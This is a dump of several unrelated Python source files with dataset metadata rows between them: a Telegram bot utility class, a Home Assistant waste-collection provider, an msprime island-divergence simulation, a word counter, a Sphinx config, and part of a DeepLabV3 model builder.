dict_power_n = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
number += 1
return str(round(size, 2)) + " " + dict_power_n[number] + "B"
async def ProgressForPyrogram(self, current, total, ud_type, message, start):
""" generic progress display for Telegram Upload / Download status """
now = time.time()
diff = now - start
if round(diff % 10.00) == 0 or current == total:
# if round(current / total * 100, 0) % 5 == 0:
percentage = current * 100 / total
speed = current / diff
elapsed_time = round(diff) * 1000
time_to_completion = round((total - current) / speed) * 1000
estimated_total_time = elapsed_time + time_to_completion
elapsed_time = self.TimeFormator(milliseconds=elapsed_time)
estimated_total_time = self.TimeFormator(milliseconds=estimated_total_time)
progress = "**[{0}{1}]** \n**Progress**: __{2}%__\n".format(
"".join(["●" for i in range(math.floor(percentage / 5))]),
"".join(["○" for i in range(20 - math.floor(percentage / 5))]),
round(percentage, 2),
)
tmp = progress + "**Done:** __{0} of {1}__\n**Speed:** __{2}/s__\n**ETA:** __{3}__\n".format(
self.HumanBytes(current),
self.HumanBytes(total),
self.HumanBytes(speed),
estimated_total_time if estimated_total_time != "" else "0 s",
)
try:
await message.edit(f"{ud_type}\n {tmp}")
except (MessageNotModified, FloodWait):
pass
def DictSizeInBytes(self, directory):
"""Returns the `directory` size in bytes."""
total = 0
try:
# print("[+] Getting the size of", directory)
for entry in os.scandir(directory):
if entry.is_file():
# if it's a file, use stat() function
total += entry.stat().st_size
elif entry.is_dir():
# if it's a directory, recursively call this function
total += self.DictSizeInBytes(entry.path)
except NotADirectoryError:
# if `directory` isn't a directory, get the file size then
return os.path.getsize(directory)
except PermissionError:
# if for whatever reason we can't open the folder, return 0
return 0
return total
def SizeFormat(self, b, factor=1024, suffix="B"):
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
def DictSize(self, location):
return self.SizeFormat(self.DictSizeInBytes(location))
def CleanHtml(self, raw_html):
cleanr = re.compile("<.*?>")
cleantext = re.sub(cleanr, "", raw_html)
return cleantext
def EscapeMarkdown(self, text):
escape_chars = r"\*_`\["
return re.sub(r"([%s])" % escape_chars, r"\\\1", text)
def MentionHtml(self, user_id, name):
return u'<a href="tg://user?id={}">{}</a>'.format(user_id, html.escape(name))
def MentionMarkdown(self, user_id, name):
return u'[{}](tg://user?id={})'.format(self.EscapeMarkdown(name), user_id)
def ParseButton(self, text):
markdown_note = text
prev = 0
note_data = ""
buttons = []
BTN_URL_REGEX = re.compile(r"(\[([^\[]+?)\]\(buttonurl:(?:/{0,2})(.+?)(:same)?\))")
for match in BTN_URL_REGEX.finditer(markdown_note):
# Check if btnurl is escaped
n_escapes = 0
to_check = match.start(1) - 1
while to_check > 0 and markdown_note[to_check] == "\\":
n_escapes += 1
to_check -= 1
# if even, not escaped -> create button
if n_escapes % 2 == 0:
# create a thruple with button label, url, and newline status
buttons.append((match.group(2), match.group(3), bool(match.group(4))))
note_data += markdown_note[prev:match.start(1)]
prev = match.end(1)
# if odd, escaped -> move along
else:
note_data += markdown_note[prev:to_check]
prev = match.start(1) - 1
else:
note_data += markdown_note[prev:]
return note_data, buttons
def BuildKeyboard(self, buttons):
keyb = []
keyb.clear()
for btn in buttons:
keyb.append(
InlineKeyboardButton(
btn[0],
callback_data=btn[1]
)
)
return keyb
def TimeParser(self, start, end=None) -> int:
if end is None:
time_end = start
else:
time_end = end - start
month = time_end // 2678400
days = time_end // 86400
hours = time_end // 3600 % 24
minutes = time_end // 60 % 60
seconds = time_end % 60
times = ""
if month:
times += "{} month, ".format(month)
if days:
times += "{} days, ".format(days)
if hours:
times += "{} hours, ".format(hours)
if minutes:
times += "{} minutes, ".format(minutes)
if seconds:
times += "{} seconds".format(seconds)
if times == "":
times = "{} miliseconds".format(time_end)
return times
def ConvertSize(self, size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
def GetArg(self, m: Message):
msg = m.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
def GetArgs(self, m: Message):
try:
msg = m.text
except AttributeError:
pass
if not msg:
return False
msg = msg.split(maxsplit=1)
if len(msg) <= 1:
return []
msg = msg[1]
try:
split = shlex.split(msg)
except ValueError:
return msg # Cannot split, let's assume that it's just one long message
return list(filter(lambda x: len(x) > 0, split))
def SpeedConvert(self, size):
power = 2**10
zero = 0
units = {
0: '',
1: 'Kb/s',
2: 'Mb/s',
3: 'Gb/s',
4: 'Tb/s'}
while size > power:
size /= power
zero += 1
return f"{round(size, 2)} {units[zero]}"
def GetReadableTime(self, seconds: int) -> str:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
remainder, result = divmod(seconds, 60) if count < 3 else divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
# generates thumbnail of download telegram media
def GenTgThumb(self, downloaded_file_name: str) -> str:
Image.open(downloaded_file_name).convert("RGB").save(downloaded_file_name)
metadata = extractMetadata(createParser(downloaded_file_name))
height = 0
if metadata.has("height"):
height = metadata.get("height")
img = Image.open(downloaded_file_name)
img.resize((320, height))
img.save(downloaded_file_name, "JPEG")
return downloaded_file_name
# get thumbnail of file if it exists
async def IsThumbExists(self, file_name: str):
thumb_image_path = os.path.join(self.TEMP_DICT, "thumb_image.jpg")
if os.path.exists(thumb_image_path):
thumb_image_path = os.path.join(self.TEMP_DICT, "thumb_image.jpg")
elif file_name is not None and file_name.lower().endswith(("mp4", "mkv", "webm")):
metadata = extractMetadata(createParser(file_name))
duration = 0
if metadata.has("duration"):
duration = metadata.get("duration").seconds
# get a random TTL from the duration
ttl = str(random.randint(0, duration - 1))
thumb_image_path = GenTgThumb(await take_screen_shot(file_name, ttl))
else:
thumb_image_path = None
return thumb_image_path
# run shell commands
async def RunCommand(self, shell_command: List) -> (str, str):
process = await asyncio.create_subprocess_exec(
*shell_command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
stdout, stderr = await process.communicate()
e_response = stderr.decode().strip()
t_response = stdout.decode().strip()
return t_response, e_response
# extract user id & first name from msg
async def ExtractUser(self, msg: Message) -> (int, str):
"""extracts the user from a message"""
user_id = None
user_first_name = None
reply = msg.reply_to_message
if reply:
if reply.from_user:
user_id = reply.from_user.id
user_first_name = reply.from_user.first_name
elif not reply:
if msg.from_user:
user_id = msg.from_user.id
user_first_name = msg.from_user.first_name
return user_id, user_first_name
# get chat type
def ChatType(self, m: Message):
return m.chat.type
| 25.664975
| 97
| 0.653481
|
cd0680c8e8001e04bf7fce86066358e6cf24e0ce
| 13,576
|
py
|
Python
|
custom_components/afvalwijzer/provider/afvalwijzer.py
|
ByKaj/homeassistant-config
|
6ce207f763ba13346bdf5c463a8c3d77f45d175c
|
[
"MIT"
] | 1
|
2020-10-10T13:17:35.000Z
|
2020-10-10T13:17:35.000Z
|
custom_components/afvalwijzer/provider/afvalwijzer.py
|
ByKaj/homeassistant-config
|
6ce207f763ba13346bdf5c463a8c3d77f45d175c
|
[
"MIT"
] | null | null | null |
custom_components/afvalwijzer/provider/afvalwijzer.py
|
ByKaj/homeassistant-config
|
6ce207f763ba13346bdf5c463a8c3d77f45d175c
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
import json
import requests
from ..const.const import _LOGGER, SENSOR_PROVIDER_TO_URL
class AfvalWijzer(object):
##########################################################################
# INIT
##########################################################################
def __init__(
self,
provider,
postal_code,
street_number,
suffix,
include_date_today,
default_label,
exclude_list,
):
self.provider = provider
self.postal_code = postal_code
self.street_number = street_number
self.suffix = suffix
self.include_date_today = include_date_today
self.default_label = default_label
self.exclude_list = exclude_list.strip().lower()
_providers = (
"mijnafvalwijzer",
"afvalstoffendienstkalender",
"rova",
)
if self.provider not in _providers:
print("Invalid provider: %s, please verify", self.provider)
if self.provider == "rova":
self.provider = "inzamelkalender.rova"
##########################################################################
# DATE CALCULATION TODAY, TOMORROW, DAY AFTER TOMORROW
##########################################################################
# today
self.today = datetime.today().strftime("%d-%m-%Y")
self.today_date = datetime.strptime(self.today, "%d-%m-%Y")
# tomorow
self.today_to_tomorrow = datetime.strptime(self.today, "%d-%m-%Y") + timedelta(
days=1
)
self.tomorrow = datetime.strftime(self.today_to_tomorrow, "%d-%m-%Y")
self.tomorrow_date = datetime.strptime(self.tomorrow, "%d-%m-%Y")
# day after tomorow
self.today_to_day_after_tomorrow = datetime.strptime(
self.today, "%d-%m-%Y"
) + timedelta(days=2)
self.day_after_tomorrow = datetime.strftime(
self.today_to_day_after_tomorrow, "%d-%m-%Y"
)
self.day_after_tomorrow_date = datetime.strptime(
self.day_after_tomorrow, "%d-%m-%Y"
)
# data collect
(
self._waste_data_raw,
self._waste_data_with_today,
self._waste_data_without_today,
) = self.get_waste_data_provider()
self._waste_data_custom = self.get_waste_data_custom()
self._waste_types_provider = self.get_waste_types_provider()
self._waste_types_custom = self.get_waste_types_custom()
##########################################################################
# GET WASTE DATA FROM PROVIDER
##########################################################################
def get_waste_data_provider(self):
try:
_LOGGER.debug(
"Connecting to the frontend (json data) of: %s", self.provider
)
url = SENSOR_PROVIDER_TO_URL["afvalwijzer_data_default"][0].format(
self.provider,
self.postal_code,
self.street_number,
self.suffix,
datetime.today().strftime("%Y-%m-%d"),
)
_LOGGER.debug("URL parsed: %s", url)
try:
raw_response = requests.get(url)
except requests.exceptions.RequestException as err:
raise ValueError(err)
try:
json_response = raw_response.json()
except ValueError:
raise ValueError("No JSON data received from " + url)
try:
waste_data_raw = (
json_response["ophaaldagen"]["data"]
+ json_response["ophaaldagenNext"]["data"]
)
except ValueError:
raise ValueError("Invalid and/or no JSON data received from " + url)
if not waste_data_raw:
_LOGGER.error("No waste data found!")
return
waste_data_with_today = {}
waste_data_without_today = {}
for item in waste_data_raw:
item_date = datetime.strptime(item["date"], "%Y-%m-%d")
item_name = item["type"].strip().lower()
if item_name not in self.exclude_list:
if item_name not in waste_data_with_today:
if item_date >= self.today_date:
waste_data_with_today[item_name] = item_date
for item in waste_data_raw:
item_date = datetime.strptime(item["date"], "%Y-%m-%d")
item_name = item["type"].strip().lower()
if item_name not in self.exclude_list:
if item_name not in waste_data_without_today:
if item_date > self.today_date:
waste_data_without_today[item_name] = item_date
try:
for item in waste_data_raw:
item_name = item["type"].strip().lower()
if item_name not in self.exclude_list:
if item_name not in waste_data_with_today.keys():
waste_data_with_today[item_name] = self.default_label
if item_name not in waste_data_without_today.keys():
waste_data_without_today[item_name] = self.default_label
except Exception as err:
_LOGGER.error("Other error occurred: %s", err)
return waste_data_raw, waste_data_with_today, waste_data_without_today
except Exception as err:
_LOGGER.error("Other error occurred: %s", err)
##########################################################################
# GENERATE DATA FOR CUSTOM SENSORS
##########################################################################
def get_waste_data_custom(self):
# start counting wiht Today's date or with Tomorrow"s date
if self.include_date_today.casefold() in ("true", "yes"):
date_selected = self.today_date
else:
date_selected = self.tomorrow_date
waste_data_custom = {}
today_multiple_items = []
tomorrow_multiple_items = []
day_after_tomorrow_multiple_items = []
next_item_multiple_items = []
##########################################################################
# GENERATE TODAY, TOMORROW, DAY AFTER TOMORROW SENSOR DATA
##########################################################################
try:
waste_data_provider = self._waste_data_with_today
waste_data_temp = {
key: value
for key, value in waste_data_provider.items()
if isinstance(value, datetime)
}
for key, value in waste_data_temp.items():
# waste type(s) today
if value == self.today_date:
if "today" in waste_data_custom.keys():
today_multiple_items.append(key)
waste_data_custom["today"] = ", ".join(today_multiple_items)
else:
today_multiple_items.append(key)
waste_data_custom["today"] = key
# waste type(s) tomorrow
if value == self.tomorrow_date:
if "tomorrow" in waste_data_custom.keys():
tomorrow_multiple_items.append(key)
waste_data_custom["tomorrow"] = ", ".join(
tomorrow_multiple_items
)
else:
tomorrow_multiple_items.append(key)
waste_data_custom["tomorrow"] = key
# waste type(s) day_after_tomorrow
if value == self.day_after_tomorrow_date:
if "day_after_tomorrow" in waste_data_custom.keys():
day_after_tomorrow_multiple_items.append(key)
waste_data_custom["day_after_tomorrow"] = ", ".join(
day_after_tomorrow_multiple_items
)
else:
day_after_tomorrow_multiple_items.append(key)
waste_data_custom["day_after_tomorrow"] = key
# set value to none if no value has been found
if "today" not in waste_data_custom.keys():
waste_data_custom["today"] = self.default_label
if "tomorrow" not in waste_data_custom.keys():
waste_data_custom["tomorrow"] = self.default_label
if "day_after_tomorrow" not in waste_data_custom.keys():
waste_data_custom["day_after_tomorrow"] = self.default_label
except Exception as err:
_LOGGER.error("Error occurred: %s", err)
##########################################################################
# GENERATE NEXT_ SENSOR DATA
##########################################################################
try:
waste_data_provider = self._waste_data_raw
waste_data_provider_past_removed = list(
filter(
lambda item: datetime.strptime(item["date"], "%Y-%m-%d")
>= date_selected,
waste_data_provider,
)
)
for item in range(len(waste_data_provider_past_removed)):
real_item = len(waste_data_provider_past_removed) - item - 1
if (
waste_data_provider_past_removed[real_item]["date"]
== self.default_label
):
del waste_data_provider_past_removed[real_item]
for item in range(len(waste_data_provider_past_removed)):
real_item = len(waste_data_provider_past_removed) - item - 1
if (
waste_data_provider_past_removed[real_item]["type"]
in self.exclude_list
):
del waste_data_provider_past_removed[real_item]
waste_data_provider_next_date = datetime.strptime(
waste_data_provider_past_removed[0]["date"], "%Y-%m-%d"
)
for item in waste_data_provider_past_removed:
item_date = datetime.strptime(item["date"], "%Y-%m-%d")
item_name = item["type"].strip().lower()
if item_date == waste_data_provider_next_date:
if "next_item" in waste_data_custom.keys():
if item_name not in waste_data_custom.keys():
next_item_multiple_items.append(item_name)
waste_data_custom["next_item"] = ", ".join(
next_item_multiple_items
)
else:
next_item_multiple_items.append(item_name)
waste_data_custom["next_item"] = item_name
# first upcoming pickup date of any waste type
waste_data_custom["next_date"] = waste_data_provider_next_date
# first upcoming waste type pickup in days
waste_data_custom["next_in_days"] = abs(
(self.today_date - waste_data_provider_next_date).days
)
# set value to none if no value has been found
if "next_date" not in waste_data_custom.keys():
waste_data_custom["next_date"] = self.default_label
if "next_in_days" not in waste_data_custom.keys():
waste_data_custom["next_in_days"] = self.default_label
if "next_item" not in waste_data_custom.keys():
waste_data_custom["next_item"] = self.default_label
except Exception as err:
_LOGGER.error("Error occurred: %s", err)
return waste_data_custom
##########################################################################
# GENERATE WASTE TYPES LIST FROM PROVIDER
##########################################################################
def get_waste_types_provider(self):
waste_data_provider = self._waste_data_without_today
waste_list_provider = list(waste_data_provider.keys())
return waste_list_provider
##########################################################################
# GENERATE SENSOR TYPES LIST FOR CUSTOM SENSORS
##########################################################################
def get_waste_types_custom(self):
waste_data_custom = self._waste_data_custom
waste_list_custom = list(waste_data_custom.keys())
return waste_list_custom
##########################################################################
# PROPERTIES FOR EXECUTION
##########################################################################
@property
def waste_data_with_today(self):
return self._waste_data_with_today
@property
def waste_data_without_today(self):
return self._waste_data_without_today
@property
def waste_data_custom(self):
return self._waste_data_custom
@property
def waste_types_provider(self):
return self._waste_types_provider
@property
def waste_types_custom(self):
return self._waste_types_custom
| 40.284866
| 87
| 0.507366
|
d3e18201ed56da9208c98a4ead1b4723927e52ff
| 6,056
|
py
|
Python
|
simulation_scripts/msp_fiji_fluctuate.py
|
g33k5p34k/PleistoDistR
|
b02b24b16995078c68a4e2b70f5f41e8bac68da2
|
[
"MIT"
] | null | null | null |
simulation_scripts/msp_fiji_fluctuate.py
|
g33k5p34k/PleistoDistR
|
b02b24b16995078c68a4e2b70f5f41e8bac68da2
|
[
"MIT"
] | null | null | null |
simulation_scripts/msp_fiji_fluctuate.py
|
g33k5p34k/PleistoDistR
|
b02b24b16995078c68a4e2b70f5f41e8bac68da2
|
[
"MIT"
] | null | null | null |
'''
Made by Ethan Gyllenhaal (egyllenhaal@unm.edu)
Last updated 12 April 2022
Script for running a single msprime simulation for dynamic divergence between two islands (designed for parallel)
Takes in parameters for infile path, output path, alpha (# propagules per unit^2), and mean dispersal distance
Infile is comma delimited with header Interval,Distance,Kadavu_target,Viti_target,Kadavu_size,Viti_size
Outputs nucleotide diversity for each island and FST
calcParameters calculates gene flow and population size per interval given input file.
run_msprime is the method for running the simulation and calculating summary statistics
main is simply the driver for everything
'''
import os, sys, math, msprime as msp, numpy as np, re, allel, argparse, pandas as pd
# global for how many generations there are per interval
# assuming a generation time of 2 years and 5k years/interval
generation_interval = 2500
# global for population density per unit^2 (meter here)
density = 0.00001
def main():
# set up parser and arguments with ArgParse
parse = argparse.ArgumentParser(description = "Get simulation parameters")
parse.add_argument("-i", "--infile", type=str, help="Path to island information file")
parse.add_argument("-o", "--output", type=str, help="Path to output file")
parse.add_argument("-a", "--alpha", type=float, help="Value of alpha, propagules/unit^2")
parse.add_argument("-d", "--dispersal", type=float, help="Value of mean dispersal distance in default units")
args = parse.parse_args()
# assign arguments to variables
infile, outfile, alpha, dispersal = args.infile, args.output, args.alpha, args.dispersal
# calculate the population sizes and migration rates over time
# uses calcParameters method below, used as input for msprime
processed_data = calcParameters(infile, alpha, dispersal, density)
# amount of generations to run the simulation for
time = 200000
# calls msprime, assigns results to variables, and writes those to output
fst, div1, div2 = run_msprime(processed_data, time)
output = open(outfile, "a")
output.write(str(fst)+"\t"+str(div1)+"\t"+str(div2)+"\n")
output.close()
def run_msprime(params, time):
# set number of samples
samples=50
# determine the interval the split occurs at
split_int = time//generation_interval
# pairing indexes and rows for parameters generated by calcParameters
params = params.reset_index()
# Set up populations, with pop1 as Viti Levu and pop2 as Kadavu
demography = msp.Demography()
demography.add_population(name="pop1", initial_size=params["Viti_pop"][0])
demography.add_population(name="pop2", initial_size=params["Kad_pop"][0])
demography.add_population(name="anc_pop12", initial_size = params["Viti_pop"][split_int]+params["Kad_pop"][split_int])
demography.add_population_split(time=time, derived=["pop1","pop2"], ancestral="anc_pop12")
# add demographic events to change population sizes and migration rates per interval
for index, row in params.iterrows():
# determine the generation number of the interval change
gen = index * generation_interval
# change rate for each interval, forward time 1->2 (V->K), backward time 2->1 (K->V)
demography.add_migration_rate_change(time=gen, source="pop2", dest="pop1", rate=row["K2V"]/row["Kad_pop"])
# change the opposite rate for each interval
demography.add_migration_rate_change(time=gen, source="pop1", dest="pop2", rate=row["V2K"]/row["Viti_pop"])
# set the sizes for each population at a given interval
demography.add_population_parameters_change(time=gen, population="pop1", initial_size=row["Viti_pop"])
demography.add_population_parameters_change(time=gen, population="pop2", initial_size=row["Kad_pop"])
# sort the demographic events
demography.sort_events()
# Run the simulation to get tree sequences
trees=msp.sim_ancestry(samples={"pop1":samples, "pop2":samples},
demography=demography,
recombination_rate=1e-8,
sequence_length=1e7)
# Add mutations to treeseqs
mutation=msp.sim_mutations(trees, rate=2.3e-9)
# get haplotypes and genotypes from simulation
haplotypes = np.array(mutation.genotype_matrix())
positions = np.array([s.position for s in trees.sites()])
genotypes = allel.HaplotypeArray(haplotypes).to_genotypes(ploidy=2)
# calculate fst
fst = allel.stats.fst.average_weir_cockerham_fst(genotypes,[list(range(0,int(samples))),list(range(int(samples),samples*2))],10)[0]
# calculate nucleotide diversity
geno1 = genotypes.take(range(0,int(samples)),axis=1)
geno2 = genotypes.take(range(int(samples),int(samples*2)), axis=1)
acount1 = geno1.count_alleles()
acount2 = geno2.count_alleles()
div1 = allel.sequence_diversity(range(1,len(acount1)),acount1)
div2 = allel.sequence_diversity(range(1,len(acount2)),acount2)
# return the summary statistics
return(fst, div1, div2)
def calcParameters(infile, alpha, mean_disp, dens):
# read in PleistoDist output as a dataframe
dframe = pd.read_csv(infile, index_col=0)
# Calculate population densities
dframe["Viti_pop"] = dframe["Viti_size"] * density
dframe["Kad_pop"] = dframe["Kadavu_size"] * density
# BACKWARD TIME Viti -> Kadavu, i.e. forward Kadavu -> Viti
dframe["V2K"] = (alpha * dframe["Kadavu_size"]) * ((dframe["Viti_target"] * np.exp(-1 * (1/mean_disp) * dframe["Distance"]))/
(2 * math.pi * dframe["Distance"]))
# BACKWARD TIME Kadavu -> Viti, i.e. forward Viti -> Kadavu
dframe["K2V"] = (alpha * dframe["Viti_size"]) * ((dframe["Kadavu_target"] * np.exp(-1 * (1/mean_disp) * dframe["Distance"]))/
(2 * math.pi * dframe["Distance"]))
return dframe
if __name__ == '__main__':
main()
| 48.063492
| 135
| 0.694518
|
66478b79444d18de093fdc5e02effa1a6db2c612
| 257
|
py
|
Python
|
word-count/word_count.py
|
ederst/exercism-python
|
8791f145ff4ce1a3b78ac3566fbe428ce3a3bd7b
|
[
"Unlicense"
] | 1
|
2021-06-25T16:09:02.000Z
|
2021-06-25T16:09:02.000Z
|
word-count/word_count.py
|
ederst/exercism-python
|
8791f145ff4ce1a3b78ac3566fbe428ce3a3bd7b
|
[
"Unlicense"
] | 1
|
2021-05-17T23:45:29.000Z
|
2021-05-17T23:46:01.000Z
|
word-count/word_count.py
|
ederst/exercism-python
|
8791f145ff4ce1a3b78ac3566fbe428ce3a3bd7b
|
[
"Unlicense"
] | null | null | null |
from collections import Counter
from typing import Dict
import re
def count_words(sentence: str) -> Dict[str, int]:
# this exact solution was suggestec by the mentor (bobahop)
return Counter(re.findall(r"[a-z0-9]+(?:'[a-z]+)?", sentence.lower()))
| 28.555556
| 74
| 0.700389
|
18307df30e11f5cfd2680aedc54632202ffdea48
| 5,314
|
py
|
Python
|
docs/conf.py
|
qqgg231/Adafruit_CircuitPython_SHT31D
|
bf53996fee22fa13ccb26c90e84ed7449474cab9
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
qqgg231/Adafruit_CircuitPython_SHT31D
|
bf53996fee22fa13ccb26c90e84ed7449474cab9
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
qqgg231/Adafruit_CircuitPython_SHT31D
|
bf53996fee22fa13ccb26c90e84ed7449474cab9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
# Uncomment the below if you use native CircuitPython modules such as
# digitalio, micropython and busio. List the modules you use. Without it, the
# autodoc module docs will fail to generate with a warning.
# autodoc_mock_imports = ["micropython", "adafruit_bus_device"]
intersphinx_mapping = {'python': ('https://docs.python.org/3.4', None),'BusDevice': ('https://circuitpython.readthedocs.io/projects/busdevice/en/latest/', None),'Register': ('https://circuitpython.readthedocs.io/projects/register/en/latest/', None),'CircuitPython': ('https://circuitpython.readthedocs.io/en/latest/', None)}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Adafruit SHT31D Library'
copyright = u'2017 Jerry Needell'
author = u'Jerry Needell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.env', 'CODE_OF_CONDUCT.md']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
#
add_function_parentheses = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# If this is True, todo emits a warning for each TODO entries. The default is False.
todo_emit_warnings = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
try:
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path(), '.']
except:
html_theme = 'default'
html_theme_path = ['.']
else:
html_theme_path = ['.']
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
html_favicon = '_static/favicon.ico'
# Output file base name for HTML help builder.
htmlhelp_basename = 'AdafruitSht31Librarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Adafruitsht31Library.tex', u'Adafruitsht31 Library Documentation',
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Adafruitsht31library', u'Adafruit sht31 Library Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Adafruitsht31Library', u'Adafruit sht31 Library Documentation',
author, 'Adafruitsht31Library', 'One line description of project.',
'Miscellaneous'),
]
| 33.847134
| 324
| 0.687053
|
d83179aef51d4daa236fd403e3d9926e126d3825
| 6,000
|
py
|
Python
|
network/modeling.py
|
nvoliver/DeepLabV3Plus-Pytorch
|
b9f18f7849da062aa68c4417944ba910863210dc
|
[
"MIT"
] | null | null | null |
network/modeling.py
|
nvoliver/DeepLabV3Plus-Pytorch
|
b9f18f7849da062aa68c4417944ba910863210dc
|
[
"MIT"
] | null | null | null |
network/modeling.py
|
nvoliver/DeepLabV3Plus-Pytorch
|
b9f18f7849da062aa68c4417944ba910863210dc
|
[
"MIT"
] | null | null | null |
from .utils import IntermediateLayerGetter
from ._deeplab import DeepLabHead, DeepLabHeadV3Plus, DeepLabV3
from .backbone import resnet
from .backbone import mobilenetv2
def _segm_resnet(name, backbone_name, num_classes, output_stride, pretrained_backbone):
# Modifcation: Option to override dilation
override_dilation = None
if isinstance(output_stride, (list, tuple)):
output_stride, override_dilation = output_stride
assert isinstance(override_dilation, (list, tuple))
assert len(override_dilation) == 3
if output_stride==8:
replace_stride_with_dilation=[False, True, True]
aspp_dilate = [12, 24, 36]
else:
replace_stride_with_dilation=[False, False, True]
aspp_dilate = [6, 12, 18]
# Modifcation: Option to override dilation
aspp_dilate = override_dilation or aspp_dilate
backbone = resnet.__dict__[backbone_name](
pretrained=pretrained_backbone,
replace_stride_with_dilation=replace_stride_with_dilation)
inplanes = 2048
low_level_planes = 256
if name=='deeplabv3plus':
return_layers = {'layer4': 'out', 'layer1': 'low_level'}
classifier = DeepLabHeadV3Plus(inplanes, low_level_planes, num_classes, aspp_dilate)
elif name=='deeplabv3':
return_layers = {'layer4': 'out'}
classifier = DeepLabHead(inplanes , num_classes, aspp_dilate)
backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)
model = DeepLabV3(backbone, classifier)
return model
def _segm_mobilenet(name, backbone_name, num_classes, output_stride, pretrained_backbone):
if output_stride==8:
aspp_dilate = [12, 24, 36]
else:
aspp_dilate = [6, 12, 18]
backbone = mobilenetv2.mobilenet_v2(pretrained=pretrained_backbone, output_stride=output_stride)
# rename layers
backbone.low_level_features = backbone.features[0:4]
backbone.high_level_features = backbone.features[4:-1]
backbone.features = None
backbone.classifier = None
inplanes = 320
low_level_planes = 24
if name=='deeplabv3plus':
return_layers = {'high_level_features': 'out', 'low_level_features': 'low_level'}
classifier = DeepLabHeadV3Plus(inplanes, low_level_planes, num_classes, aspp_dilate)
elif name=='deeplabv3':
return_layers = {'high_level_features': 'out'}
classifier = DeepLabHead(inplanes , num_classes, aspp_dilate)
backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)
model = DeepLabV3(backbone, classifier)
return model
def _load_model(arch_type, backbone, num_classes, output_stride, pretrained_backbone):
if backbone=='mobilenetv2':
model = _segm_mobilenet(arch_type, backbone, num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
elif backbone.startswith('resnet'):
model = _segm_resnet(arch_type, backbone, num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
else:
raise NotImplementedError
return model
# Deeplab v3
def deeplabv3_resnet50(num_classes=21, output_stride=8, pretrained_backbone=True):
"""Constructs a DeepLabV3 model with a ResNet-50 backbone.
Args:
num_classes (int): number of classes.
output_stride (int): output stride for deeplab.
pretrained_backbone (bool): If True, use the pretrained backbone.
"""
return _load_model('deeplabv3', 'resnet50', num_classes, output_stride=output_stride, pretrained_backbone=pretrained_backbone)
def deeplabv3_resnet101(num_classes=21, output_stride=8, pretrained_backbone=True):
